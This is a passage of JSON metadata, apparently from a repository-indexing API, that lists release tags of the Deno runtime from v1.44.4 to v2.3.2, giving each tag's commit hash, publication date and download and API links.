denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno